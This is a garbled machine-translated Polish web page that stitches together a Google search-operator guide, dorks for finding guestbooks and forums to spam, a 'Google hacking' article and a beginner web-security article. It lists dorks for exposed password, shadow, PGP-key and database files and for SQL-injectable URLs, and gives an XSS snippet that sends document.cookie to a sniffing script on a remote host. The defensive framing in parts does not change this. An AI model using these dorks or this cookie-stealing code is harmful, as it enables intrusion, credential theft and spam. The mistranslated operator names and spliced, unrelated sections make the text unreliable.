DZWON

Są tacy, którzy czytają tę wiadomość przed tobą.
Zapisz się, aby otrzymywać najnowsze artykuły.
E-mail
Imię
Nazwisko
Jak chcesz przeczytać The Bell
Bez spamu

Jak prawidłowo wyszukiwać w google.com

Każdy chyba wie, jak korzystać z wyszukiwarki takiej jak Google \u003d) Ale nie każdy wie, że jeśli poprawnie skomponujesz zapytanie za pomocą specjalnych konstrukcji, możesz osiągnąć wyniki, których szukasz, znacznie wydajniej i szybciej \u003d) W tym artykule postaram się to pokazać i jak należy to zrobić, aby wyszukiwać poprawnie

Google obsługuje kilka operatorów wyszukiwania zaawansowanego, które mają specjalne znaczenie podczas wyszukiwania w google.com. Zazwyczaj operatory te modyfikują wyszukiwanie, a nawet nakazują Google wykonywanie zupełnie innych typów wyszukiwań. Na przykład konstrukcja połączyć: jest operatorem specjalnym, a request link: www.google.com nie zapewni normalnego wyszukiwania, ale zamiast tego znajdzie wszystkie strony internetowe, które mają linki do google.com.
alternatywne typy żądań

pamięć podręczna: Jeśli w zapytaniu uwzględnisz inne słowa, Google podświetli te słowa zawarte w dokumencie w pamięci podręcznej.
Na przykład, cache: www.web site pokaże zawartość z pamięci podręcznej z podświetlonym słowem „internet”.

połączyć: wyszukiwane hasło omówione powyżej spowoduje wyświetlenie stron internetowych, które zawierają łącza do określonego zapytania.
Na przykład: link: www.site wyświetli wszystkie strony, które mają link do http: //www.site

związane z: Wyświetla strony internetowe, które są „powiązane” z określoną stroną internetową.
Na przykład, related: www.google.com wyświetli listę stron internetowych, które są podobne do strony głównej Google.

info: Żądanie informacji: zawiera niektóre informacje, które Google ma o żądanej stronie internetowej.
Na przykład, info: strona internetowa pokaże informacje o naszym forum \u003d) (Armada - Forum webmasterów dla dorosłych).

Inne prośby o informacje

definiować: Zapytanie define: zapewni definicję słów, które wprowadzisz później, zebrane z różnych źródeł internetowych. Definicja będzie obejmowała całą wprowadzoną frazę (czyli będzie zawierała wszystkie słowa w dokładnym zapytaniu).

dyby: Jeśli rozpoczniesz swoje żądanie od akcji: Google potraktuje pozostałe warunki zapytania jako symbole giełdowe i umieści link do strony z gotowymi informacjami dotyczącymi tych symboli.
Na przykład, akcje: Intel yahoo wyświetli informacje o firmie Intel i Yahoo. (Pamiętaj, że musisz wpisać najnowsze symbole wiadomości, a nie nazwę firmy)

Żądanie modyfikatorów

teren: Jeśli umieścisz site: w zapytaniu, Google ograniczy wyniki do witryn znalezionych w danej domenie.
Możesz także wyszukiwać poszczególne strefy, takie jak ru, org, com itp. ( strona: com strona: ru)

allintitle: Jeśli uruchomisz żądanie z allintitle :, Google ograniczy wyniki do wszystkich słów żądania w nagłówku.
Na przykład, allintitle: wyszukiwarka google zwróci wszystkie strony wyszukiwania Google, takie jak obrazy, blog itp

intitle: Jeśli umieścisz intitle: w swoim żądaniu, Google ograniczy wyniki do dokumentów zawierających to słowo w tytule.
Na przykład, intitle: Biznes

allinurl: Jeśli uruchomisz zapytanie z allinurl: Google ograniczy wyniki do wszystkich słów zapytania w adresie URL.
Na przykład, allinurl: wyszukiwarka google zwróci dokumenty z google i przeszuka w nagłówku. Opcjonalnie możesz oddzielić słowa ukośnikiem (/), a słowa po obu stronach ukośnika będą wyszukiwane na tej samej stronie: Przykład allinurl: foo / bar

inurl: Jeśli umieścisz inurl: w zapytaniu, Google ograniczy wyniki do dokumentów zawierających to słowo w adresie URL.
Na przykład, Animacja inurl: strona internetowa

w tekście: wyszukuje tylko w tekście strony określone słowo, ignorując tytuł i tekst linków oraz inne rzeczy niezwiązane z. Istnieje również pochodna tego modyfikatora - allintext: te. ponadto wszystkie słowa w zapytaniu będą wyszukiwane tylko w tekście, co jest również ważne, ignorując często używane słowa w linkach
Na przykład, intext: forum

zakres dat: wyszukiwanie w ramach czasowych (daterange: 2452389-2452389), daty dla godzin są podawane w formacie juliańskim.

No i różne ciekawe przykłady próśb

Przykłady pisania zapytań do Google. Dla spamerów

Inurl: control.guest? A \u003d znak

Witryna: books.dreambook.com „Adres URL strony głównej” „Podpisz mój” inurl: znak

Witryna: www.freegb.net Strona domowa

Inurl: sign.asp „Liczba znaków”

„Wiadomość:” inurl: sign.cfm „Nadawca:”

Inurl: register.php „Rejestracja użytkownika” „Witryna internetowa”

Inurl: edu / guestbook „Wpisz się do księgi gości”

Inurl: post „Opublikuj komentarz” „URL”

Inurl: / archives / „Komentarze:” „Pamiętasz informacje?”

„Skrypt i księga gości Utworzone przez:” „URL:” „Komentarze:”

Inurl :? Action \u003d dodaj „phpBook” „URL”

Intitle: „Prześlij nową historię”

Czasopisma

Inurl: www.livejournal.com/users/ mode \u003d odpowiedz

Inurl bestjournal.com/ mode \u003d odpowiedz

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? „Księga gości”

Blogi

Inurl: blogger.com/comment.g? ”PostID” „anonymous”

Inurl: typepad.com/ „Opublikuj komentarz” „Pamiętasz dane osobowe?”

Inurl: greatjournal.com/community/ „Opublikuj komentarz” „adresy anonimowych plakatów”

„Opublikuj komentarz” „adresy anonimowych plakatów” -

Intitle: „Opublikuj komentarz”

Inurl: pirillo.com „Opublikuj komentarz”

Fora

Inurl: gate.html? ”Name \u003d Forums” „mode \u003d Reply”

Inurl: "forum / posting.php? Mode \u003d Reply"

Inurl: "mes.php?"

Inurl: „Members.html”

Inurl: forum / memberlist.php? ”

Hacking with Google

Alexander Antipov

Wyszukiwarka Google (www.google.com) zapewnia wiele opcji wyszukiwania. Wszystkie te możliwości są nieocenionym narzędziem wyszukiwania dla pierwszego internauty, a jednocześnie jeszcze potężniejszą bronią inwazji i zniszczenia w rękach ludzi o złych zamiarach, w tym nie tylko hakerów, ale także przestępców niekomputerowych, a nawet terrorystów.
(9475 wyświetleń w 1 tydzień)


Denis Batrankov
denisNOSPAMixi.ru

Uwaga:Ten artykuł nie stanowi przewodnika po działaniu. Ten artykuł został napisany z myślą o Was, administratorach serwerów WEB, abyście stracili fałszywe poczucie, że jesteście bezpieczni, a na koniec zrozumieliście podstępność tej metody pozyskiwania informacji i zabieracie się za ochronę swojej strony.

Wprowadzenie

Na przykład znalazłem 1670 stron w 0,14 sekundy!

2. Przedstawmy kolejną linię, na przykład:

inurl: "auth_user_file.txt"

trochę mniej, ale to już wystarczy do darmowego pobrania i ataków siłowych (przy użyciu tego samego Johna Rozpruwacza). Poniżej podam więcej przykładów.

Trzeba więc zdać sobie sprawę, że wyszukiwarka Google odwiedziła większość stron w Internecie i zapisała zawarte na nich informacje w pamięci podręcznej. Te zapisane w pamięci podręcznej informacje pozwalają uzyskać informacje o witrynie i zawartości witryny bez bezpośredniego połączenia z witryną, po prostu wkopując się w informacje przechowywane w Google. Ponadto, jeśli informacje na stronie nie są już dostępne, informacje w pamięci podręcznej mogą nadal zostać zachowane. Wystarczy znać niektóre słowa kluczowe Google. Ta technika nazywa się Google Hacking.

Po raz pierwszy informacje o Google Hacking pojawiły się na liście mailingowej Bugtruck 3 lata temu. W 2001 r. Temat ten poruszył francuski student. Oto link do tego listu http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Zawiera pierwsze przykłady takich zapytań:

1) Indeks / admin
2) Indeks / hasło
3) Indeks / poczta
4) Indeks / + banki + typ pliku: xls (dla francji ...)
5) Indeks / + passwd
6) Indeks / password.txt

Temat ten pojawił się dość niedawno w anglojęzycznej części Internetu: po artykule Johnny'ego Longa opublikowanym 7 maja 2004 roku. Aby uzyskać pełniejsze badanie hakowania Google, sugeruję odwiedzić witrynę tego autora pod adresem http://johnny.ihackstuff.com. W tym artykule chcę Cię tylko zaktualizować.

Kto może z tego korzystać:
- Dziennikarze, szpiedzy i wszyscy ci, którzy lubią wtykać nos w inne sprawy, mogą to wykorzystać do poszukiwania kompromitujących dowodów.
- Hakerzy szukający odpowiednich celów do hakowania.

Jak działa Google.

Aby kontynuować rozmowę, przypomnę niektóre słowa kluczowe używane w zapytaniach Google.

Wyszukaj za pomocą znaku +

Google wyklucza słowa, które nie są ważne dla Google. Na przykład słowa pytające, przyimki i artykuły w języku angielskim: na przykład są, z, gdzie. W języku rosyjskim Google wydaje się uważać wszystkie słowa za ważne. Jeśli słowo zostanie wykluczone z wyszukiwania, Google pisze o tym. Aby wyszukiwarka Google rozpoczęła wyszukiwanie stron zawierających te słowa przed nimi, musisz dodać znak + bez spacji przed słowem. Na przykład:

as + bazy

Szukaj za pomocą znaku -

Jeśli Google znajdzie dużą liczbę stron, z których konieczne jest wykluczenie stron o określonej tematyce, możesz zmusić Google do wyszukiwania tylko stron, które nie zawierają określonych słów. Aby to zrobić, musisz wskazać te słowa, stawiając przed każdym znakiem - bez spacji przed słowem. Na przykład:

wódka wędkarska

Szukaj używając ~

Możesz chcieć znaleźć nie tylko określone słowo, ale także jego synonimy. Aby to zrobić, poprzedź słowo symbolem ~.

Znalezienie dokładnego wyrażenia za pomocą podwójnych cudzysłowów

Google wyszukuje na każdej stronie wszystkie wystąpienia słów, które wpisałeś w ciągu zapytania i nie dba o względną pozycję słów, najważniejsze jest to, że wszystkie określone słowa znajdują się na stronie w tym samym czasie (jest to akcja domyślna). Aby znaleźć dokładną frazę, musisz umieścić ją w cudzysłowie. Na przykład:

„bookend”

Aby mieć co najmniej jedno z podanych słów, musisz jawnie określić operację logiczną: OR. Na przykład:

książka bezpieczeństwo LUB ochrona

Ponadto możesz użyć znaku * w pasku wyszukiwania, aby oznaczyć dowolne słowo i. oznaczać dowolny znak.

Znajdowanie słów za pomocą dodatkowych operatorów

Istnieją operatory wyszukiwania określone w ciągu wyszukiwania w formacie:

operator: termin_wyszukiwania

Spacje obok okrężnicy nie są potrzebne. Jeśli wstawisz spację po dwukropku, zobaczysz komunikat o błędzie, a przed nim Google użyje ich jako zwykłego ciągu wyszukiwania.
Istnieją grupy dodatkowych operatorów wyszukiwania: języki - wskaż, w jakim języku chcesz zobaczyć wynik, data - ogranicz wyniki z ostatnich trzech, sześciu lub 12 miesięcy, wystąpienia - wskaż, gdzie w dokumencie należy szukać ciągu: wszędzie, w tytule, w adresie, w domenach - przeszukaj określoną witrynę lub przeciwnie, wyklucz ją z wyszukiwania, bezpieczne wyszukiwanie - blokuje witryny zawierające określony typ informacji i usuwa je ze stron wyników wyszukiwania.
Jednak niektóre operatory nie potrzebują dodatkowego parametru, na przykład zapytania „ cache: www.google.com„można nazwać pełnoprawnym ciągiem wyszukiwania, a niektóre słowa kluczowe, wręcz przeciwnie, wymagają wyszukiwanego słowa, na przykład” site: www.google.com pomoc”. W świetle naszego tematu przyjrzyjmy się następującym operatorom:

Operator

Opis

Wymaga dodatkowego parametru?

szukaj tylko w witrynie określonej w wyszukiwaniu_term

szukaj tylko w dokumentach typu search_term

znajdź strony zawierające termin search_term w tytule

znajdź strony zawierające wszystkie słowa search_term w tytule

znajdź strony zawierające słowo search_term w swoim adresie URL

znajdź strony zawierające wszystkie słowa search_term w swoim adresie URL

Operator teren: ogranicza wyszukiwanie tylko do określonej witryny i możesz określić nie tylko nazwę domeny, ale także adres IP. Na przykład wprowadź:

Operator typ pliku: ogranicza wyszukiwanie do plików określonego typu. Na przykład:

Od daty wydania artykułu Google może wyszukiwać w 13 różnych formatach plików:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (LWP)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (WKS, WPS, WDB)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Tekst (ans, txt)

Operator połączyć: pokazuje wszystkie strony, które wskazują na określoną stronę.
Prawdopodobnie zawsze ciekawie jest sprawdzić, ile miejsc w Internecie wie o tobie. Próbować:

Operator pamięć podręczna: pokazuje wersję witryny w pamięci podręcznej Google, jaka wyglądała, gdy Google ostatnio odwiedzała tę stronę. Bierzemy każdą witrynę, która często się zmienia i wygląda:

Operator intitle: wyszukuje określone słowo w tytule strony. Operator allintitle: jest rozszerzeniem - szuka wszystkich określonych słów w tytule strony. Porównać:

intitle: lot na Marsa
intitle: lot intitle: do intitle: mars
allintitle: lot na Marsa

Operator inurl:powoduje, że Google wyświetla wszystkie strony zawierające określony ciąg w adresie URL. Operator allinurl: wyszukuje wszystkie słowa w adresie URL. Na przykład:

allinurl: kwas acid_stat_alerts.php

To polecenie jest szczególnie przydatne dla tych, którzy nie mają SNORT - przynajmniej mogą zobaczyć, jak to działa w prawdziwym systemie.

Metody hakerskie z Google

Dowiedzieliśmy się więc, że używając kombinacji powyższych operatorów i słów kluczowych, każdy może zacząć zbierać potrzebne informacje i wyszukiwać luki. Techniki te są często nazywane hakowaniem Google.

Mapa witryny

Możesz użyć operatora site:, aby wyświetlić wszystkie linki znalezione przez Google w witrynie. Zwykle strony tworzone dynamicznie przez skrypty nie są indeksowane przy użyciu parametrów, więc niektóre witryny używają filtrów ISAPI, aby odsyłacze nie były w formie /article.asp?num\u003d10&dst\u003d5i ukośnikami / artykuł / abc / num / 10 / dst / 5... Dzieje się tak, aby witryna była generalnie indeksowana przez wyszukiwarki.

Spróbujmy:

site: www.whitehouse.gov whitehouse

Google uważa, że \u200b\u200bkażda strona w serwisie zawiera słowo whitehouse. To jest to, czego używamy, aby uzyskać wszystkie strony.
Istnieje również wersja uproszczona:

strona: whitehouse.gov

A najlepsze jest to, że towarzysze z whitehouse.gov nawet nie wiedzieli, że przyjrzeliśmy się strukturze ich witryny, a nawet przejrzeliśmy zapisane w pamięci podręcznej strony, które Google pobierał dla siebie. Można to wykorzystać do badania struktury witryn i przeglądania treści bez zauważenia na razie.

Przeglądanie listy plików w katalogach

Serwery WEB mogą wyświetlać listy katalogów serwerów zamiast zwykłych stron HTML. Zwykle ma to na celu skłonienie użytkowników do wybrania i pobrania określonych plików. Jednak w wielu przypadkach to nie administratorzy powinni pokazywać zawartość katalogu. Dzieje się tak z powodu nieprawidłowej konfiguracji serwera lub braku strony głównej w katalogu. Dzięki temu haker ma szansę znaleźć coś interesującego w katalogu i wykorzystać to do własnych celów. Aby znaleźć wszystkie takie strony, wystarczy zauważyć, że wszystkie zawierają w tytule słowa: index of. Ale ponieważ indeks słów zawiera nie tylko takie strony, musimy sprecyzować zapytanie i wziąć pod uwagę słowa kluczowe na samej stronie, więc zapytania formularza będą nam odpowiadać:

intitle: index.of katalogu nadrzędnego
intitle: index.of name size

Ponieważ większość list katalogów jest zamierzona, może być trudno znaleźć błędne listy za pierwszym razem. Ale przynajmniej możesz już skorzystać z list, aby określić wersję serwera internetowego, jak opisano poniżej.

Pobieranie wersji serwera WEB.

Znajomość wersji serwera WEB jest zawsze przydatna przed rozpoczęciem ataku hakerów. Ponownie, dzięki Google, możesz uzyskać te informacje bez łączenia się z serwerem. Jeśli przyjrzysz się uważnie liście katalogu, zobaczysz, że jest tam wyświetlana nazwa serwera WEB i jego wersja.

Apache1.3.29 - ProXad Server pod adresem trf296.free.fr Port 80

Doświadczony administrator może zmienić te informacje, ale z reguły jest to prawda. Dlatego, aby uzyskać te informacje, wystarczy wysłać zapytanie:

intitle: index.of server.at

Aby uzyskać informacje dotyczące konkretnego serwera, wyjaśniamy żądanie:

intitle: index.of server.at site: ibm.com

Lub odwrotnie, szukamy serwerów działających na określonej wersji serwera:

intitle: index.of Apache / 2.0.40 Server pod adresem

Ta technika może zostać użyta przez hakera w celu znalezienia ofiary. Jeśli na przykład ma exploita dla określonej wersji serwera internetowego, może go znaleźć i wypróbować istniejący exploit.

Wersję serwera można również uzyskać, przeglądając strony, które są instalowane domyślnie podczas instalowania najnowszej wersji serwera WEB. Na przykład, aby wyświetlić stronę testową Apache 1.2.6, wystarczy wpisać

intitle: Test.Page.for.Apache it.worked!

Co więcej, niektóre systemy operacyjne natychmiast instalują i uruchamiają serwer WEB podczas instalacji. Jednak niektórzy użytkownicy nawet nie są tego świadomi. Oczywiście, jeśli zauważysz, że ktoś nie usunął domyślnej strony, logiczne jest założenie, że komputer w ogóle nie został poddany żadnej konfiguracji i prawdopodobnie jest podatny na ataki.

Spróbuj znaleźć strony IIS 5.0

allintitle: Witamy w Usługach internetowych systemu Windows 2000

W przypadku IIS można określić nie tylko wersję serwera, ale także wersję systemu Windows i Service Pack.

Innym sposobem ustalenia wersji serwera WEB jest wyszukanie podręczników (stron pomocy) i przykładów, które mogą być domyślnie zainstalowane w witrynie. Hakerzy znaleźli wiele sposobów wykorzystania tych składników w celu uzyskania uprzywilejowanego dostępu do witryny. Dlatego musisz usunąć te komponenty w miejscu produkcji. Nie wspominając już o tym, że dzięki obecności tych komponentów można uzyskać informacje o typie serwera i jego wersji. Na przykład znajdź podręcznik Apache:

inurl: ręczne moduły dyrektyw Apache

Korzystanie z Google jako skanera CGI.

Skaner CGI lub skaner sieciowy to narzędzie do wyszukiwania podatnych skryptów i programów na serwerze ofiary. Te narzędzia powinny wiedzieć, czego szukać, w tym celu mają całą listę podatnych plików, na przykład:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Każdy z tych plików możemy znaleźć za pomocą Google, używając słowa index of lub inurl oprócz nazwy pliku w pasku wyszukiwania: możemy znaleźć strony z podatnymi skryptami, na przykład:

allinurl: /random_banner/index.cgi

Korzystając z dodatkowej wiedzy, haker może wykorzystać lukę w zabezpieczeniach skryptu i wykorzystać tę lukę, aby zmusić skrypt do zwrócenia dowolnego pliku przechowywanego na serwerze. Na przykład plik z hasłami.

Jak uchronić się przed włamaniem do Google.

1. Nie wysyłaj ważnych danych na serwer WEB.

Nawet jeśli tymczasowo opublikowałeś dane, możesz o tym zapomnieć, w przeciwnym razie ktoś będzie miał czas na znalezienie i pobranie tych danych, zanim je usuniesz. Nie rób tego. Istnieje wiele innych sposobów przesyłania danych, aby chronić je przed kradzieżą.

2. Sprawdź swoją witrynę.

Skorzystaj z opisanych metod, aby sprawdzić swoją witrynę. Sprawdzaj swoją witrynę okresowo, korzystając z nowych metod, które pojawiają się pod adresem http://johnny.ihackstuff.com. Pamiętaj, że jeśli chcesz zautomatyzować swoje działania, musisz uzyskać specjalne pozwolenie od Google. Jeśli przeczytasz uważnie http://www.google.com/terms_of_service.html wtedy zobaczysz zdanie: Nie możesz wysyłać żadnych automatycznych zapytań do systemu Google bez uprzedniej wyraźnej zgody Google.

3. Możesz nie potrzebować Google do indeksowania Twojej witryny lub jej części.

Google umożliwia usunięcie linku do Twojej witryny lub jej części ze swojej bazy danych, a także usunięcie stron z pamięci podręcznej. Ponadto możesz zabronić wyszukiwania obrazów w swojej witrynie, zabronić wyświetlania krótkich fragmentów stron w wynikach wyszukiwania. Wszystkie opcje usuwania witryny są opisane na stronie http://www.google.com/remove.html ... Aby to zrobić, musisz potwierdzić, że faktycznie jesteś właścicielem tej witryny lub wstaw tagi na stronie lub

4. Użyj pliku robots.txt

Wiadomo, że wyszukiwarki zaglądają do pliku robots.txt znajdującego się w katalogu głównym serwisu i nie indeksują tych części, które są oznaczone słowem Zakazać... Możesz to wykorzystać, aby zapobiec indeksowaniu części witryny. Na przykład, aby uniknąć indeksowania całej witryny, utwórz plik robots.txt zawierający dwa wiersze:

Agent użytkownika: *
Disallow: /

Co jeszcze się dzieje

Aby życie nie wydawało ci się miodem, powiem na koniec, że są strony, które śledzą tych ludzi, którzy za pomocą powyższych metod szukają dziur w skryptach i serwerach WEB. Przykładem takiej strony jest

Podanie.

Trochę słodki. Wypróbuj samodzielnie coś z poniższej listy:

1. #mysql dump filetype: sql - znajdź zrzuty baz danych mySQL
2. Raport podsumowujący lukę w zabezpieczeniach hosta - pokazuje, jakie luki w zabezpieczeniach zostały znalezione przez inne osoby
3. phpMyAdmin działający na inurl: main.php - wymusi to ścisłą kontrolę przez panel phpmyadmin
4. nie do rozpowszechniania poufne
5. Szczegóły żądania Zmienne serwera drzewa kontrolnego
6. Bieganie w trybie dziecka
7. Ten raport został wygenerowany przez WebLog
8. intitle: index.of cgiirc.config
9.filetype: conf inurl: firewall -intitle: cvs - czy ktoś może potrzebować plików konfiguracyjnych firewalla? :)
10. intitle: index.of finances.xls - hmm ....
11.intitle: Indeks czatów dbconvert.exe - logi czatów icq
12.intext: Analiza ruchu Tobias Oetiker
13.intitle: Statystyki użytkowania generowane przez Webalizer
14.intitle: statystyki zaawansowanych statystyk internetowych
15.intitle: index.of ws_ftp.ini - ws konfiguracja ftp
16.inurl: ipsec.secrets przechowuje wspólne sekrety - tajny klucz to dobre znalezisko
17.inurl: main.php Witamy w phpMyAdmin
18..inurl: informacje o serwerze Informacje o serwerze Apache
19. witryna: oceny administratora edu
20. ORA-00921: nieoczekiwany koniec polecenia SQL - pobieranie ścieżek
21. intitle: index.of trillian.ini
22. intitle: Indeks pwd.db
23. intitle: index.of people.lst
24. intitle: index.of master.passwd
25. inurl: passlist.txt
26. intitle: Indeks .mysql_history
27. intitle: indeks intext: globals.inc
28. intitle: index.of administrators.pwd
29. intitle: Index.of etc shadow
30. intitle: index.of secring.pgp
31.inurl: config.php dbuname dbpass
32. inurl: wykonaj filetype: ini

  • „Hakowanie przez Google”
  • Ośrodek szkoleniowy „Informzashita” http://www.itsecurity.ru - wiodący specjalistyczny ośrodek w zakresie szkoleń z zakresu bezpieczeństwa informacji (Licencja Moskiewskiego Komitetu Edukacyjnego nr 015470, Państwowa akredytacja nr 004251). Jedyne autoryzowane centrum szkoleniowe w zakresie Internet Security Systems i Clearswift w Rosji i krajach WNP. Autoryzowane Centrum Szkoleniowe Microsoft (specjalizacja Bezpieczeństwo). Programy szkoleniowe są koordynowane z Państwową Komisją Techniczną Rosji, FSB (FAPSI). Świadectwa ukończenia szkoleń i dokumenty państwowe dotyczące rozwoju zawodowego.

    SoftKey to wyjątkowa usługa dla kupujących, programistów, dealerów i partnerów stowarzyszonych. Ponadto jest to jeden z najlepszych sklepów z oprogramowaniem online w Rosji, Ukrainie, Kazachstanie, który oferuje klientom szeroki asortyment, wiele metod płatności, szybką (często natychmiastową) realizację zamówienia, śledzenie procesu realizacji zamówienia w sekcji osobistej, różne rabaty ze sklepu i producentów PRZEZ.

    Postanowiłem trochę porozmawiać o bezpieczeństwie informacji. Artykuł będzie przydatny dla początkujących programistów i tych, którzy dopiero zaczęli tworzyć Frontend. Jaki jest problem?

    Wielu początkujących programistów jest tak uzależnionych od pisania kodu, że zupełnie zapomina o bezpieczeństwie swojej pracy. A co najważniejsze, zapominają o podatnościach, takich jak zapytania SQL, XXS. Wymyślają również lekkie hasła do swoich paneli administracyjnych i są poddawani brutalnej sile. Czym są te ataki i jak można ich uniknąć?

    Wstrzyknięcie SQL

    Wstrzyknięcie SQL to najczęstszy typ ataku na bazę danych, który jest przeprowadzany za pomocą zapytania SQL dla określonego DBMS. Wiele osób, a nawet duże firmy cierpią z powodu takich ataków. Powodem jest błąd programisty podczas pisania bazy danych, a właściwie zapytań SQL.

    Atak SQL injection jest możliwy z powodu nieprawidłowego przetwarzania danych wejściowych wykorzystywanych w zapytaniach SQL. Jeśli haker pomyślnie przeprowadzi atak, ryzykujesz utratę nie tylko zawartości baz danych, ale także haseł i logów panelu administracyjnego. I te dane wystarczą, aby całkowicie przejąć stronę lub dokonać nieodwracalnych zmian.

    Atak można z powodzeniem replikować w skryptach napisanych w językach PHP, ASP, Perl i innych. Sukces takich ataków zależy bardziej od tego, jaki system DBMS jest używany i jak zaimplementowany jest sam skrypt. Na świecie istnieje wiele podatnych na ataki witryn wstrzykujących SQL. Łatwo to zweryfikować. Wystarczy wpisać „dorks” - to specjalne prośby o wyszukanie podatnych stron. Tutaj jest kilka z nich:

    • inurl: index.php? id \u003d
    • inurl: trainers.php? id \u003d
    • inurl: buy.php? category \u003d
    • inurl: article.php? ID \u003d
    • inurl: play_old.php? id \u003d
    • inurl: deklaracja_more.php? decl_id \u003d
    • inurl: pageid \u003d
    • inurl: games.php? id \u003d
    • inurl: page.php? file \u003d
    • inurl: newsDetail.php? id \u003d
    • inurl: gallery.php? id \u003d
    • inurl: article.php? id \u003d

    Jak ich używać? Wystarczy wpisać je do wyszukiwarki Google lub Yandex. Wyszukiwarka udostępni nie tylko podatną na ataki witrynę, ale także stronę poświęconą tej luce. Ale nie będziemy się nad tym rozwodzić i upewnimy się, że strona jest naprawdę podatna na ataki. W tym celu wystarczy wstawić pojedynczy cudzysłów „” po wartości „id \u003d 1”. Coś takiego:

    • inurl: games.php? id \u003d 1 '

    Witryna wyświetli błąd dotyczący zapytania SQL. Czego nasz haker potrzebuje dalej?

    A potem potrzebuje tego właśnie linku do strony błędu. Wówczas praca nad luką w większości przypadków odbywa się w dystrybucji „Kali linux” z jej narzędziami do tej części: wstrzyknięciem kodu i wykonaniem niezbędnych operacji. Jak to się stanie, nie mogę ci powiedzieć. Ale możesz znaleźć informacje na ten temat w Internecie.

    Atak XSS

    Ten rodzaj ataku jest przeprowadzany na plikach cookie. Użytkownicy z kolei bardzo lubią je ratować. Dlaczego nie? Jak bez nich? Rzeczywiście, dzięki plikom cookie nie używamy hasła z Vk.com lub Mail.ru sto razy. I niewielu tych, którzy im odmawiają. Jednak w Internecie dla hakerów często obowiązuje zasada: współczynnik wygody jest wprost proporcjonalny do współczynnika niepewności.

    Aby zaimplementować atak XSS, nasz haker potrzebuje znajomości JavaScript. Na pierwszy rzut oka język jest bardzo prosty i nieszkodliwy, ponieważ nie ma dostępu do zasobów komputera. Haker może pracować z JavaScriptem tylko w przeglądarce, ale to wystarczy. W końcu najważniejsze jest wpisanie kodu na stronie internetowej.

    Nie będę wchodził w szczegóły dotyczące procesu ataku. Powiem ci tylko podstawy i znaczenie tego, jak to się dzieje.

    Haker może dodać kod JS do forum lub księgi gości:

    Skrypty przekierują nas na zainfekowaną stronę, na której zostanie wykonany kod: czy będzie to sniffer, jakiś rodzaj pamięci, czy też exploit, który w jakiś sposób wykradnie nasze pliki cookie z pamięci podręcznej.

    Dlaczego JavaScript? Ponieważ JavaScript dobrze radzi sobie z żądaniami sieciowymi i ma dostęp do plików cookie. Ale jeśli nasz skrypt przeniesie nas na jakąś stronę, to użytkownik z łatwością to zauważy. Tutaj haker używa bardziej przebiegłej opcji - po prostu wpisuje kod na obrazku.

    Img \u003d new Image ();

    Img.src \u003d "http://192.168.1.7/sniff.php?32+document.cookie;

    Po prostu tworzymy obraz i przypisujemy nasz skrypt jako adres.

    Jak się przed tym uchronić? Bardzo proste - nie klikaj podejrzanych linków.

    Ataki DoS i DDos


    DoS (z angielskiego Denial of Service - denial of service) - atak hakera na system komputerowy w celu doprowadzenia go do awarii. Jest to tworzenie warunków, w których świadomi użytkownicy systemu nie mają dostępu do udostępnionych zasobów systemowych (serwerów) lub dostęp ten jest utrudniony. Awaria systemu może być krokiem w kierunku jego wychwycenia, jeśli w sytuacji awaryjnej oprogramowanie poda jakieś krytyczne informacje: na przykład wersję, część kodu programu itp. Ale najczęściej jest to miara presji ekonomicznej: utrata prostej usługi, która generuje dochód. Rachunki od dostawcy lub środki mające na celu uniknięcie ataku znacząco uderzają w cel Obecnie najpopularniejsze są ataki DoS i DDoS, które pozwalają na awarię prawie każdego systemu bez pozostawiania żadnych prawnie istotnych dowodów.

    Jaka jest różnica między atakami DoS i DDos?

    DoS to sprytnie skonstruowany atak. Na przykład, jeśli serwer nie sprawdzi poprawności nadchodzących pakietów, to haker może zgłosić takie żądanie, które będzie przetwarzane w nieskończoność, a czas procesora nie będzie wystarczający do pracy z innymi połączeniami. W związku z tym klienci otrzymają odmowę usługi. Jednak w ten sposób nie zadziała przeciążenie lub wyłączenie dużych, dobrze znanych witryn. Uzbrojone są w dość szerokie kanały i super mocne serwery, które bez problemu radzą sobie z takim przeciążeniem.

    DDoS to właściwie ten sam atak, co DoS. Ale jeśli w DoS jest jeden pakiet żądań, to w DDoS może ich być setki lub więcej. Nawet bardzo wydajne serwery mogą nie być w stanie poradzić sobie z tym przeciążeniem. Dam ci przykład.

    Atak DoS występuje, gdy rozmawiasz z kimś, ale wtedy pojawia się jakaś źle wychowana osoba i zaczyna głośno krzyczeć. Jednocześnie rozmowa jest niemożliwa lub bardzo trudna. Rozwiązanie: wezwij ochronę, która uspokoi się i wyprowadzi osobę z pomieszczenia. Ataki DDoS mają miejsce, gdy na takie źle wychowane osoby wpada tłum tysięcy. W takim przypadku strażnicy nie będą w stanie przekręcić się i zabrać wszystkich.

    DoS i DDoS są wytwarzane z komputerów zwanych zombie. Są to komputery użytkowników zhakowanych przez hakerów, którzy nawet nie podejrzewają, że ich komputer bierze udział w ataku na serwer.

    Jak się przed tym uchronić? Ogólnie nic. Ale możliwe jest skomplikowanie zadania dla hakera. Aby to zrobić, musisz wybrać dobry hosting z wydajnymi serwerami.

    Brutalny atak

    Deweloper może wymyślić wiele systemów ochrony przed atakami, w pełni przejrzeć napisane przez nas skrypty, sprawdzić witrynę pod kątem luk itp. Ale jeśli chodzi o ostatni krok układu strony, a mianowicie, kiedy łatwo będzie umieścić hasło w panelu administratora, może o jednym zapomnieć. Hasło!

    Zdecydowanie nie zaleca się ustawiania prostego hasła. Może to być 12345, 1114457, vasya111 itd. Nie zaleca się ustawiania haseł krótszych niż 10-11 znaków. W przeciwnym razie możesz poddać się najczęstszemu i nietrudnemu atakowi - Brute force.

